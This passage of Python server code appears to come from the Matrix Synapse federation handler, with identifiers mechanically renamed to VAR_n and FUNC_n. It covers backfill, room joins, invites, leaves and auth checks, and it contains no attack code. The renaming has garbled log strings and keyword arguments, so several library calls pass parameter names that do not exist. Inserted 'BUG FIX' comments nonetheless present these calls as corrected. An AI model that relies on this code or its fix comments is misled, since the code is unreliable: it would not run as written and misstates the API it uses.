        VAR_77,
        VAR_76,
    )
    # Prefer extremities at or below the current pagination depth.
    VAR_78 = [
        t for t in VAR_76 if int(t[1]) <= VAR_19
    ]
    if VAR_78:
        VAR_76 = VAR_78
    # Only try the five deepest extremities.
    VAR_18 = dict(VAR_76[:5])
    VAR_79 = await self.state_handler.get_current_state(VAR_11)

    def FUNC_46(VAR_2):
        # Map each joined member's domain to its shallowest join depth
        # and return the domains sorted by that depth.
        VAR_161 = [
            (state_key, int(VAR_1.depth))
            for (e_type, state_key), VAR_1 in VAR_2.items()
            if e_type == VAR_188.Member and VAR_1.membership == Membership.JOIN
        ]
        VAR_162 = {}  # type: Dict[str, int]
        for u, d in VAR_161:
            try:
                VAR_196 = get_domain_from_id(u)
                VAR_197 = VAR_162.get(VAR_196)
                if VAR_197:
                    VAR_162[VAR_196] = min(d, VAR_197)
                else:
                    VAR_162[VAR_196] = d
            except Exception:
                pass
        # BUG FIX: `sorted` takes `key=`, not `VAR_144=`.
        return sorted(VAR_162.items(), key=lambda d: d[1])

    VAR_80 = FUNC_46(VAR_79)
    VAR_81 = [
        domain for domain, depth in VAR_80 if domain != self.server_name
    ]

    async def FUNC_47(VAR_82):
        # Try each candidate server until a backfill succeeds; 4xx-class
        # failures are propagated, everything else is logged and skipped.
        for VAR_196 in VAR_82:
            try:
                # BUG FIX: `VAR_18=extremities` referenced an undefined
                # name; pass the local VAR_18.
                await self.backfill(
                    VAR_196, VAR_11, VAR_17=100, VAR_18=VAR_18
                )
                return True
            except SynapseError as VAR_170:
                VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
                continue
            except HttpResponseException as VAR_170:
                if 400 <= VAR_170.code < 500:
                    raise VAR_170.to_synapse_error()
                VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
                continue
            except CodeMessageException as VAR_170:
                if 400 <= VAR_170.code < 500:
                    raise
                VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
                continue
            except NotRetryingDestination as VAR_170:
                VAR_0.info(str(VAR_170))
                continue
            except RequestSendFailed as VAR_170:
                VAR_0.info("Failed to get FUNC_6 from %s because %s", VAR_196, VAR_170)
                continue
            except FederationDeniedError as VAR_170:
                VAR_0.info(VAR_170)
                continue
            except Exception as VAR_170:
                VAR_0.exception("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
                continue
        return False

    VAR_83 = await FUNC_47(VAR_81)
    if VAR_83:
        return True
    # Fall back to servers that were in the room at the extremities.
    VAR_84 = set(VAR_81)
    VAR_84.add(self.server_name)
    VAR_14 = list(VAR_18.keys())
    VAR_0.debug("calling resolve_state_groups in _maybe_backfill")
    VAR_85 = preserve_fn(self.state_handler.resolve_state_groups_for_events)
    VAR_86 = await make_deferred_yieldable(
        defer.gatherResults(
            [VAR_85(VAR_11, [VAR_170]) for VAR_170 in VAR_14], consumeErrors=True
        )
    )
    VAR_86 = dict(zip(VAR_14, [s.state for s in VAR_86]))
    VAR_87 = await self.store.get_events(
        [VAR_160 for ids in VAR_86.values() for VAR_160 in ids.values()],
        get_prev_content=False,
    )
    VAR_86 = {
        VAR_144: {
            k: VAR_87[VAR_160]
            for k, VAR_160 in state_dict.items()
            if VAR_160 in VAR_87
        }
        for VAR_144, state_dict in VAR_86.items()
    }
    for VAR_160, VAR_166 in VAR_76:
        VAR_81 = FUNC_46(VAR_86[VAR_160])
        VAR_83 = await FUNC_47(
            [VAR_196 for VAR_196, VAR_166 in VAR_81 if VAR_196 not in VAR_84]
        )
        if VAR_83:
            return True
        VAR_84.update(VAR_196 for VAR_196, VAR_166 in VAR_81)
    return False
async def FUNC_8(
    self, VAR_10: str, VAR_11: str, VAR_20: Iterable[str]
):
    """Fetch the given event ids from VAR_10 as outliers and persist them
    along with whatever auth events we can resolve locally."""
    VAR_28 = await self.store.get_room_version(VAR_11)
    VAR_60 = {}  # type: Dict[str, EventBase]

    async def FUNC_48(VAR_12: str):
        # Fetch a single event; failures are logged and skipped.
        with nested_logging_context(VAR_12):
            try:
                VAR_1 = await self.federation_client.get_pdu(
                    [VAR_10], VAR_12, VAR_28, outlier=True,
                )
                if VAR_1 is None:
                    VAR_0.warning(
                        "Server %s didn't return VAR_1 %s", VAR_10, VAR_12,
                    )
                    return
                VAR_60[VAR_1.event_id] = VAR_1
            except Exception as VAR_170:
                # BUG FIX: the log call referenced `e`, which is not in
                # scope here (the exception is bound to VAR_170).
                VAR_0.warning(
                    "Error fetching VAR_37 VAR_2/VAR_89 VAR_1 %s: %s %s",
                    VAR_12,
                    type(VAR_170),
                    VAR_170,
                )

    # Fetch up to five events concurrently.
    await concurrently_execute(FUNC_48, VAR_20, 5)
    # Resolve the auth events of everything we fetched.
    VAR_3 = [
        aid
        for VAR_1 in VAR_60.values()
        for aid in VAR_1.auth_event_ids()
        if aid not in VAR_60
    ]
    VAR_88 = await self.store.get_events(
        VAR_3, allow_rejected=True,
    )
    VAR_34 = []
    for VAR_1 in VAR_60.values():
        VAR_89 = {}
        for auth_event_id in VAR_1.auth_event_ids():
            VAR_187 = VAR_88.get(auth_event_id) or VAR_60.get(auth_event_id)
            if VAR_187:
                VAR_89[(VAR_187.type, VAR_187.state_key)] = VAR_187
            else:
                VAR_0.info("Missing VAR_89 VAR_1 %s", auth_event_id)
        VAR_34.append(CLASS_0(VAR_1, None, VAR_89))
    await self._handle_new_events(
        VAR_10, VAR_11, VAR_34,
    )
def FUNC_9(self, VAR_21):
    """Sanity-check that VAR_21 does not reference an excessive number of
    prev_events or auth_events.

    Raises:
        SynapseError: 400 if either limit is exceeded.
    """
    prev_count = len(VAR_21.prev_event_ids())
    if prev_count > 20:
        VAR_0.warning(
            "Rejecting VAR_1 %s which has %i prev_events",
            VAR_21.event_id,
            prev_count,
        )
        raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
    auth_count = len(VAR_21.auth_event_ids())
    if auth_count > 10:
        VAR_0.warning(
            "Rejecting VAR_1 %s which has %i auth_events",
            VAR_21.event_id,
            auth_count,
        )
        raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def FUNC_10(self, VAR_22, VAR_1):
    """Ask the remote server VAR_22 to sign and send the given invite
    event; returns the event handed back by the remote."""
    return await self.federation_client.send_invite(
        VAR_10=VAR_22,
        VAR_11=VAR_1.room_id,
        VAR_12=VAR_1.event_id,
        VAR_6=VAR_1,
    )
async def FUNC_11(self, VAR_12: str) -> List[EventBase]:
    """Return the full auth chain for the given event id, including the
    event's own auth events (include_given=True)."""
    VAR_1 = await self.store.get_event(VAR_12)
    VAR_89 = await self.store.get_auth_chain(
        list(VAR_1.auth_event_ids()), include_given=True
    )
    return list(VAR_89)
async def FUNC_12(
    self, VAR_23: Iterable[str], VAR_11: str, VAR_24: str, VAR_25: JsonDict
) -> Tuple[str, int]:
    """Join VAR_24 to the remote room VAR_11 via the servers in VAR_23.

    Returns:
        The join event id and the stream id once the join is persisted.
    """
    assert self.config.worker.worker_app is None
    VAR_0.debug("Joining %s to %s", VAR_24, VAR_11)
    VAR_5, VAR_1, VAR_90 = await self._make_and_verify_event(
        VAR_23,
        VAR_11,
        VAR_24,
        "join",
        VAR_25,
        VAR_30={"ver": KNOWN_ROOM_VERSIONS},
    )
    # Queue up PDUs arriving for this room while we are mid-join.
    assert VAR_11 not in self.room_queues
    self.room_queues[VAR_11] = []
    await self._clean_room_for_join(VAR_11)
    VAR_91 = set()
    try:
        # Try the server that answered make_join first.
        VAR_98 = list(VAR_23)
        try:
            VAR_98.remove(VAR_5)
            VAR_98.insert(0, VAR_5)
        except ValueError:
            pass
        VAR_117 = await self.federation_client.send_join(
            VAR_98, VAR_1, VAR_90
        )
        VAR_5 = VAR_117["origin"]
        VAR_2 = VAR_117["state"]
        VAR_63 = VAR_117["auth_chain"]
        # BUG FIX: list.sort takes `key=`; `VAR_144=` is not a valid kwarg.
        VAR_63.sort(key=lambda VAR_170: VAR_170.depth)
        VAR_91.update([s.event_id for s in VAR_2])
        VAR_91.update([a.event_id for a in VAR_63])
        VAR_91.add(VAR_1.event_id)
        VAR_0.debug("do_invite_join VAR_63: %s", VAR_63)
        VAR_0.debug("do_invite_join VAR_2: %s", VAR_2)
        VAR_0.debug("do_invite_join VAR_1: %s", VAR_1)
        # BUG FIX: `VAR_11=room_id` referenced an undefined name.
        await self.store.upsert_room_on_join(
            VAR_11=VAR_11, VAR_28=VAR_90,
        )
        VAR_163 = await self._persist_auth_tree(
            VAR_5, VAR_11, VAR_63, VAR_2, VAR_1, VAR_90
        )
        # Wait for the event-persisting instance to catch up.
        await self._replication.wait_for_stream_position(
            self.config.worker.events_shard_config.get_instance(VAR_11),
            "events",
            VAR_163,
        )
        VAR_164 = await self.store.get_room_predecessor(VAR_11)
        if not VAR_164 or not isinstance(VAR_164.get("room_id"), str):
            return VAR_1.event_id, VAR_163
        VAR_165 = VAR_164["room_id"]
        VAR_0.debug(
            "Found VAR_164 for %s during remote join: %s", VAR_11, VAR_165
        )
        # Upgraded room: migrate relevant state from the predecessor.
        VAR_143 = self.hs.get_room_member_handler()
        await VAR_143.transfer_room_state_on_room_upgrade(
            VAR_165, VAR_11
        )
        VAR_0.debug("Finished joining %s to %s", VAR_24, VAR_11)
        return VAR_1.event_id, VAR_163
    finally:
        # Replay any PDUs queued while joining, in the background.
        VAR_26 = self.room_queues[VAR_11]
        del self.room_queues[VAR_11]
        run_in_background(self._handle_queued_pdus, VAR_26)
async def FUNC_13(self, VAR_26):
    """Drain PDUs queued while we were joining their room, processing
    each under its own logging context; failures are logged and skipped."""
    for p, VAR_5 in VAR_26:
        try:
            VAR_0.info(
                "Processing queued PDU %s which was received "
                "while we were joining %s",
                p.event_id,
                p.room_id,
            )
            with nested_logging_context(p.event_id):
                await self.on_receive_pdu(VAR_5, p, VAR_7=True)
        except Exception as VAR_170:
            VAR_0.warning(
                "Error handling queued PDU %s from %s: %s", p.event_id, VAR_5, VAR_170
            )
async def FUNC_14(
    self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
    """Handle a /make_join request: build (but do not persist) a join
    event template for VAR_27 in room VAR_11.

    Raises:
        SynapseError: 403 if VAR_27 is not from the requesting server.
        NotFoundError: if we are no longer in the room.
    """
    if get_domain_from_id(VAR_27) != VAR_5:
        VAR_0.info(
            "Got /make_join request for user %r from different VAR_5 %s, ignoring",
            VAR_27,
            VAR_5,
        )
        raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
    VAR_28 = await self.store.get_room_version_id(VAR_11)
    VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
    if not VAR_53:
        VAR_0.info(
            "Got /make_join request for room %s we are no longer in", VAR_11,
        )
        raise NotFoundError("Not an active room on this server")
    VAR_92 = {"membership": Membership.JOIN}
    VAR_93 = self.event_builder_factory.new(
        VAR_28,
        {
            "type": VAR_188.Member,
            "content": VAR_92,
            "room_id": VAR_11,
            "sender": VAR_27,
            "state_key": VAR_27,
        },
    )
    try:
        # BUG FIX: `VAR_93=builder` referenced an undefined name; the
        # local builder is VAR_93.
        VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
            VAR_93=VAR_93
        )
    except SynapseError as VAR_170:
        VAR_0.warning("Failed to create join to %s because %s", VAR_11, VAR_170)
        raise
    # Check we would auth the event (no signatures present yet).
    await self.auth.check_from_context(
        VAR_28, VAR_1, VAR_32, do_sig_check=False
    )
    return VAR_1
async def FUNC_15(self, VAR_5, VAR_6):
    """Handle a /send_join request: verify the sender's domain, persist
    the join event, and return the room state and auth chain the joining
    server needs."""
    VAR_1 = VAR_6
    VAR_0.debug(
        "on_send_join_request from %s: Got VAR_1: %s, signatures: %s",
        VAR_5,
        VAR_1.event_id,
        VAR_1.signatures,
    )
    if get_domain_from_id(VAR_1.sender) != VAR_5:
        VAR_0.info(
            "Got /send_join request for user %r from different VAR_5 %s",
            VAR_1.sender,
            VAR_5,
        )
        raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
    # The event is no longer an outlier once we accept it; record which
    # server we are sending it on behalf of.
    VAR_1.internal_metadata.outlier = False
    VAR_1.internal_metadata.send_on_behalf_of = VAR_5
    VAR_32 = await self._handle_new_event(VAR_5, VAR_1)
    VAR_0.debug(
        "on_send_join_request: After FUNC_26: %s, sigs: %s",
        VAR_1.event_id,
        VAR_1.signatures,
    )
    # Return the state *before* the join, plus its auth chain.
    VAR_94 = await VAR_32.get_prev_state_ids()
    VAR_95 = list(VAR_94.values())
    VAR_63 = await self.store.get_auth_chain(VAR_95)
    VAR_2 = await self.store.get_events(list(VAR_94.values()))
    return {"state": list(VAR_2.values()), "auth_chain": VAR_63}
async def FUNC_16(
    self, VAR_5: str, VAR_1: EventBase, VAR_28: RoomVersion
):
    """Handle an invite for one of our users received over federation:
    validate it, sign it, persist it as an out-of-band outlier membership
    event, and return it.

    Raises:
        SynapseError: if any validity or policy check fails.
    """
    if VAR_1.state_key is None:
        raise SynapseError(400, "The invite VAR_1 did not have a VAR_2 key")
    VAR_96 = await self.store.is_room_blocked(VAR_1.room_id)
    if VAR_96:
        raise SynapseError(403, "This room has been blocked on this server")
    if self.hs.config.block_non_admin_invites:
        raise SynapseError(403, "This server does not accept room invites")
    if not self.spam_checker.user_may_invite(
        VAR_1.sender, VAR_1.state_key, VAR_1.room_id
    ):
        raise SynapseError(
            403, "This user is not permitted to send invites to this server/user"
        )
    VAR_29 = VAR_1.content.get("membership")
    if VAR_1.type != VAR_188.Member or VAR_29 != Membership.INVITE:
        raise SynapseError(400, "The VAR_1 was not an m.room.member invite event")
    VAR_97 = get_domain_from_id(VAR_1.sender)
    if VAR_97 != VAR_5:
        raise SynapseError(
            400, "The invite VAR_1 was not from the server sending it"
        )
    if not self.is_mine_id(VAR_1.state_key):
        raise SynapseError(400, "The invite VAR_1 must be for this server")
    # Never allow invites from the server-notices user to be rejected
    # into existence here.
    if VAR_1.state_key == self._server_notices_mxid:
        raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
    # BUG FIX: `VAR_28=room_version` referenced an undefined name; the
    # parameter is VAR_28.
    await self._maybe_store_room_on_outlier_membership(
        VAR_11=VAR_1.room_id, VAR_28=VAR_28
    )
    VAR_1.internal_metadata.outlier = True
    VAR_1.internal_metadata.out_of_band_membership = True
    # Add our own signature before persisting.
    VAR_1.signatures.update(
        compute_event_signature(
            VAR_28,
            VAR_1.get_pdu_json(),
            self.hs.hostname,
            self.hs.signing_key,
        )
    )
    VAR_32 = await self.state_handler.compute_event_context(VAR_1)
    await self.persist_events_and_notify(VAR_1.room_id, [(VAR_1, VAR_32)])
    return VAR_1
async def FUNC_17(
    self, VAR_23: Iterable[str], VAR_11: str, VAR_27: str, VAR_25: JsonDict
) -> Tuple[EventBase, int]:
    """Reject an invite by asking a server in VAR_23 to make and send a
    leave event on our behalf; returns the event and its stream id."""
    # BUG FIX: `VAR_25=content` referenced an undefined name; the
    # parameter is VAR_25.
    VAR_5, VAR_1, VAR_28 = await self._make_and_verify_event(
        VAR_23, VAR_11, VAR_27, "leave", VAR_25=VAR_25
    )
    # Persisted as an out-of-band outlier: we are not in the room.
    VAR_1.internal_metadata.outlier = True
    VAR_1.internal_metadata.out_of_band_membership = True
    # Try the server that answered make_leave first.
    VAR_98 = list(VAR_23)
    try:
        VAR_98.remove(VAR_5)
        VAR_98.insert(0, VAR_5)
    except ValueError:
        pass
    await self.federation_client.send_leave(VAR_98, VAR_1)
    VAR_32 = await self.state_handler.compute_event_context(VAR_1)
    VAR_99 = await self.persist_events_and_notify(
        VAR_1.room_id, [(VAR_1, VAR_32)]
    )
    return VAR_1, VAR_99
async def FUNC_18(
    self,
    VAR_23: Iterable[str],
    VAR_11: str,
    VAR_27: str,
    VAR_29: str,
    VAR_25: JsonDict = {},
    VAR_30: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
    """Ask the servers in VAR_23 for a membership event template of type
    VAR_29 for VAR_27 in VAR_11, and sanity-check what comes back.

    NOTE(review): VAR_25 uses a mutable default ({}); kept to preserve the
    externally visible signature -- it is never mutated here.
    """
    # BUG FIX: `VAR_30=params` referenced an undefined name; the
    # parameter is VAR_30.
    (
        VAR_5,
        VAR_1,
        VAR_28,
    ) = await self.federation_client.make_membership_event(
        VAR_23, VAR_11, VAR_27, VAR_29, VAR_25, VAR_30=VAR_30
    )
    VAR_0.debug("Got VAR_183 to make_%s: %s", VAR_29, VAR_1)
    # The remote must have returned the event we asked for.
    assert VAR_1.type == VAR_188.Member
    assert VAR_1.user_id == VAR_27
    assert VAR_1.state_key == VAR_27
    assert VAR_1.room_id == VAR_11
    return VAR_5, VAR_1, VAR_28
async def FUNC_19(
    self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
    """Handle a /make_leave request: build (but do not persist) a leave
    event template for VAR_27 in room VAR_11."""
    if get_domain_from_id(VAR_27) != VAR_5:
        VAR_0.info(
            "Got /make_leave request for user %r from different VAR_5 %s, ignoring",
            VAR_27,
            VAR_5,
        )
        raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
    VAR_28 = await self.store.get_room_version_id(VAR_11)
    VAR_93 = self.event_builder_factory.new(
        VAR_28,
        {
            "type": VAR_188.Member,
            "content": {"membership": Membership.LEAVE},
            "room_id": VAR_11,
            "sender": VAR_27,
            "state_key": VAR_27,
        },
    )
    # BUG FIX: `VAR_93=builder` referenced an undefined name; the local
    # builder is VAR_93.
    VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
        VAR_93=VAR_93
    )
    try:
        # Check we would auth the event (no signatures present yet).
        await self.auth.check_from_context(
            VAR_28, VAR_1, VAR_32, do_sig_check=False
        )
    except AuthError as VAR_170:
        VAR_0.warning("Failed to create new leave %r because %s", VAR_1, VAR_170)
        raise VAR_170
    return VAR_1
async def FUNC_20(self, VAR_5, VAR_6):
    """Handle a /send_leave request: verify the sender's domain matches
    VAR_5, then persist the leave event."""
    VAR_1 = VAR_6
    VAR_0.debug(
        "on_send_leave_request: Got VAR_1: %s, signatures: %s",
        VAR_1.event_id,
        VAR_1.signatures,
    )
    if get_domain_from_id(VAR_1.sender) != VAR_5:
        VAR_0.info(
            "Got /send_leave request for user %r from different VAR_5 %s",
            VAR_1.sender,
            VAR_5,
        )
        raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
    # The event is no longer an outlier once we accept it.
    VAR_1.internal_metadata.outlier = False
    await self._handle_new_event(VAR_5, VAR_1)
    VAR_0.debug(
        "on_send_leave_request: After FUNC_26: %s, sigs: %s",
        VAR_1.event_id,
        VAR_1.signatures,
    )
    return None
async def FUNC_21(self, VAR_11: str, VAR_12: str) -> List[EventBase]:
    """Return the room state *before* event VAR_12: the stored state group
    for the event with the event's own state contribution rolled back.
    Returns [] if we have no state group for it."""
    VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
    VAR_100 = await self.state_store.get_state_groups(VAR_11, [VAR_12])
    if VAR_100:
        VAR_166, VAR_2 = list(VAR_100.items()).pop()
        VAR_167 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_2}
        if VAR_1.is_state():
            # Undo the event's own contribution to the state map: restore
            # the event it replaced, or remove the key entirely.
            if "replaces_state" in VAR_1.unsigned:
                VAR_198 = VAR_1.unsigned["replaces_state"]
                if VAR_198 != VAR_1.event_id:
                    VAR_200 = await self.store.get_event(VAR_198)
                    VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_200
            else:
                del VAR_167[(VAR_1.type, VAR_1.state_key)]
        VAR_168 = list(VAR_167.values())
        return VAR_168
    else:
        return []
async def FUNC_22(self, VAR_11: str, VAR_12: str) -> List[str]:
    """As FUNC_21, but returning state event *ids* rather than events:
    the state before VAR_12 with its own contribution rolled back."""
    VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
    VAR_100 = await self.state_store.get_state_groups_ids(VAR_11, [VAR_12])
    if VAR_100:
        VAR_166, VAR_2 = list(VAR_100.items()).pop()
        VAR_167 = VAR_2
        if VAR_1.is_state():
            # Undo the event's own contribution to the state map.
            if "replaces_state" in VAR_1.unsigned:
                VAR_198 = VAR_1.unsigned["replaces_state"]
                if VAR_198 != VAR_1.event_id:
                    VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_198
            else:
                VAR_167.pop((VAR_1.type, VAR_1.state_key), None)
        return list(VAR_167.values())
    else:
        return []
@log_function
async def FUNC_23(
    self, VAR_5: str, VAR_11: str, VAR_31: List[str], VAR_17: int
) -> List[EventBase]:
    """Handle a backfill request from VAR_5: capped at 100 events and
    filtered by what that server is allowed to see."""
    VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
    if not VAR_101:
        raise AuthError(403, "Host not in room.")
    VAR_17 = min(VAR_17, 100)
    VAR_20 = await self.store.get_backfill_events(VAR_11, VAR_31, VAR_17)
    VAR_20 = await filter_events_for_server(self.storage, VAR_5, VAR_20)
    return VAR_20
@log_function
async def FUNC_24(
    self, VAR_5: str, VAR_12: str
) -> Optional[EventBase]:
    """Return a single event to VAR_5 if it exists, that server is in the
    room, and visibility rules permit it; otherwise None (or 403 if the
    server is not in the room)."""
    VAR_1 = await self.store.get_event(
        VAR_12, allow_none=True, allow_rejected=True
    )
    if VAR_1:
        VAR_101 = await self.auth.check_host_in_room(VAR_1.room_id, VAR_5)
        if not VAR_101:
            raise AuthError(403, "Host not in room.")
        # Apply server-side visibility filtering (may redact the event).
        VAR_20 = await filter_events_for_server(self.storage, VAR_5, [VAR_1])
        VAR_1 = VAR_20[0]
        return VAR_1
    else:
        return None
async def FUNC_25(self, VAR_32):
    """Look up the minimum depth recorded for the given room."""
    min_depth = await self.store.get_min_depth(VAR_32)
    return min_depth
async def FUNC_26(
    self, VAR_5, VAR_1, VAR_2=None, VAR_3=None, VAR_33=False
):
    """Prep, auth-check and persist a single new event, returning its
    context. Push actions are generated for live (non-outlier,
    non-backfilled, non-rejected) events and rolled back on failure."""
    # BUG FIX: the keyword values referenced the undefined names `state`,
    # `auth_events` and `backfilled`; pass the actual parameters.
    VAR_32 = await self._prep_event(
        VAR_5, VAR_1, VAR_2=VAR_2, VAR_3=VAR_3, VAR_33=VAR_33
    )
    try:
        if (
            not VAR_1.internal_metadata.is_outlier()
            and not VAR_33
            and not VAR_32.rejected
        ):
            await self.action_generator.handle_push_actions_for_event(
                VAR_1, VAR_32
            )
        await self.persist_events_and_notify(
            VAR_1.room_id, [(VAR_1, VAR_32)], VAR_33=VAR_33
        )
    except Exception:
        # Don't leave staged push actions behind if persistence failed.
        run_in_background(
            self.store.remove_push_actions_from_staging, VAR_1.event_id
        )
        raise
    return VAR_32
async def FUNC_27(
    self,
    VAR_5: str,
    VAR_11: str,
    VAR_34: Iterable[CLASS_0],
    VAR_33: bool = False,
) -> None:
    """Prep a batch of events concurrently, then persist them in one go."""

    async def FUNC_49(VAR_102: CLASS_0):
        # Prep a single event under its own logging context.
        VAR_1 = VAR_102.event
        with nested_logging_context(suffix=VAR_1.event_id):
            # BUG FIX: `VAR_33=backfilled` referenced an undefined name;
            # the parameter is VAR_33.
            VAR_168 = await self._prep_event(
                VAR_5,
                VAR_1,
                VAR_2=VAR_102.state,
                VAR_3=VAR_102.auth_events,
                VAR_33=VAR_33,
            )
            return VAR_168

    VAR_103 = await make_deferred_yieldable(
        defer.gatherResults(
            [run_in_background(FUNC_49, VAR_102) for VAR_102 in VAR_34],
            consumeErrors=True,
        )
    )
    # BUG FIX: `VAR_33=backfilled` referenced an undefined name here too.
    await self.persist_events_and_notify(
        VAR_11,
        [
            (VAR_102.event, VAR_32)
            for VAR_102, VAR_32 in zip(VAR_34, VAR_103)
        ],
        VAR_33=VAR_33,
    )
async def FUNC_28(
    self,
    VAR_5: str,
    VAR_11: str,
    VAR_3: List[EventBase],
    VAR_2: List[EventBase],
    VAR_1: EventBase,
    VAR_28: RoomVersion,
) -> int:
    """Persist an auth chain (VAR_3) and state (VAR_2) as outliers,
    auth-checking each event, then persist VAR_1 itself.

    Returns:
        The stream id after persisting VAR_1.
    """
    VAR_104 = {}
    for VAR_170 in itertools.chain(VAR_3, VAR_2):
        VAR_170.internal_metadata.outlier = True
        VAR_169 = await self.state_handler.compute_event_context(VAR_170)
        VAR_104[VAR_170.event_id] = VAR_169
    VAR_60 = {
        VAR_170.event_id: VAR_170 for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1])
    }
    VAR_105 = None
    for VAR_170 in VAR_3:
        if (VAR_170.type, VAR_170.state_key) == (VAR_188.Create, ""):
            VAR_105 = VAR_170
            break
    if VAR_105 is None:
        raise SynapseError(400, "No create VAR_1 in state")
    # The create event pins the room version; reject mismatches.
    VAR_106 = VAR_105.content.get(
        "room_version", RoomVersions.V1.identifier
    )
    if VAR_28.identifier != VAR_106:
        raise SynapseError(400, "Room version mismatch")
    # Fetch any referenced auth events missing from the batch.
    VAR_107 = set()
    for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
        for VAR_160 in VAR_170.auth_event_ids():
            if VAR_160 not in VAR_60:
                VAR_107.add(VAR_160)
    for VAR_160 in VAR_107:
        # BUG FIX: `VAR_28=room_version` referenced an undefined name;
        # the parameter is VAR_28.
        VAR_171 = await self.federation_client.get_pdu(
            [VAR_5], VAR_160, VAR_28=VAR_28, outlier=True, timeout=10000,
        )
        if VAR_171 and VAR_171.event_id == VAR_160:
            VAR_60[VAR_160] = VAR_171
        else:
            VAR_0.info("Failed to find VAR_89 VAR_1 %r", VAR_160)
    for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
        VAR_172 = {
            (VAR_60[VAR_160].type, VAR_60[VAR_160].state_key): VAR_60[VAR_160]
            for VAR_160 in VAR_170.auth_event_ids()
            if VAR_160 in VAR_60
        }
        if VAR_105:
            VAR_172[(VAR_188.Create, "")] = VAR_105
        try:
            event_auth.check(VAR_28, VAR_170, VAR_3=VAR_172)
        except SynapseError as err:
            # Rejections are recorded; only fatal for VAR_1 itself.
            VAR_0.warning("Rejecting %s because %s", VAR_170.event_id, err.msg)
            if VAR_170 == VAR_1:
                raise
            VAR_104[VAR_170.event_id].rejected = RejectedReason.AUTH_ERROR
    # Persist the auth chain and state first, then VAR_1 on top of the
    # provided old state.
    await self.persist_events_and_notify(
        VAR_11,
        [
            (VAR_170, VAR_104[VAR_170.event_id])
            for VAR_170 in itertools.chain(VAR_3, VAR_2)
        ],
    )
    VAR_108 = await self.state_handler.compute_event_context(
        VAR_1, old_state=VAR_2
    )
    return await self.persist_events_and_notify(
        VAR_11, [(VAR_1, VAR_108)]
    )
async def FUNC_29(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_2: Optional[Iterable[EventBase]],
    VAR_3: Optional[MutableStateMap[EventBase]],
    VAR_33: bool,
) -> EventContext:
    """Compute the event context and run auth and soft-fail checks for a
    newly received event; returns the (possibly rejected) context."""
    VAR_32 = await self.state_handler.compute_event_context(VAR_1, old_state=VAR_2)
    if not VAR_3:
        # Derive the auth events from the state before the event.
        VAR_94 = await VAR_32.get_prev_state_ids()
        VAR_173 = self.auth.compute_auth_events(
            VAR_1, VAR_94, for_verification=True
        )
        VAR_174 = await self.store.get_events(VAR_173)
        VAR_3 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_174.values()}
    if VAR_1.type == VAR_188.Member and not VAR_1.auth_event_ids():
        # Shallow membership events may legitimately omit auth events;
        # allow the create event through if it is the sole prev event.
        if len(VAR_1.prev_event_ids()) == 1 and VAR_1.depth < 5:
            VAR_189 = await self.store.get_event(
                VAR_1.prev_event_ids()[0], allow_none=True
            )
            if VAR_189 and VAR_189.type == VAR_188.Create:
                VAR_3[(VAR_189.type, VAR_189.state_key)] = VAR_189
    # BUG FIX: `VAR_3=auth_events` referenced an undefined name; the
    # local map is VAR_3.
    VAR_32 = await self.do_auth(VAR_5, VAR_1, VAR_32, VAR_3=VAR_3)
    if not VAR_32.rejected:
        await self._check_for_soft_fail(VAR_1, VAR_2, VAR_33)
    if VAR_1.type == VAR_188.GuestAccess and not VAR_32.rejected:
        await self.maybe_kick_guest_users(VAR_1)
    return VAR_32
async def FUNC_30(
    self, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]], VAR_33: bool
) -> None:
    """Soft-fail check: if VAR_1 does not auth against the *current*
    state of the room (rather than the state at its prev events), mark it
    soft-failed so it is persisted but withheld from clients."""
    if VAR_33 or VAR_1.internal_metadata.is_outlier():
        return
    VAR_109 = await self.store.get_latest_event_ids_in_room(VAR_1.room_id)
    VAR_110 = set(VAR_109)
    VAR_111 = set(VAR_1.prev_event_ids())
    if VAR_110 == VAR_111:
        # The event extends the current forward extremities: no check.
        return
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
    if VAR_2 is not None:
        # Resolve the provided state against the state at the current
        # forward extremities.
        VAR_175 = await self.state_store.get_state_groups(
            VAR_1.room_id, VAR_110
        )
        VAR_176 = list(VAR_175.values())  # type: List[Iterable[EventBase]]
        VAR_176.append(VAR_2)
        VAR_177 = await self.state_handler.resolve_events(
            VAR_28, VAR_176, VAR_1
        )
        VAR_126 = {
            k: VAR_170.event_id for k, VAR_170 in VAR_177.items()
        }  # type: StateMap[str]
    else:
        VAR_126 = await self.state_handler.get_current_state_ids(
            VAR_1.room_id, latest_event_ids=VAR_110
        )
    VAR_0.debug(
        "Doing soft-fail check for %s: VAR_2 %s", VAR_1.event_id, VAR_126,
    )
    # Only state entries relevant to auth'ing this event type matter.
    VAR_112 = auth_types_for_event(VAR_1)
    VAR_113 = [
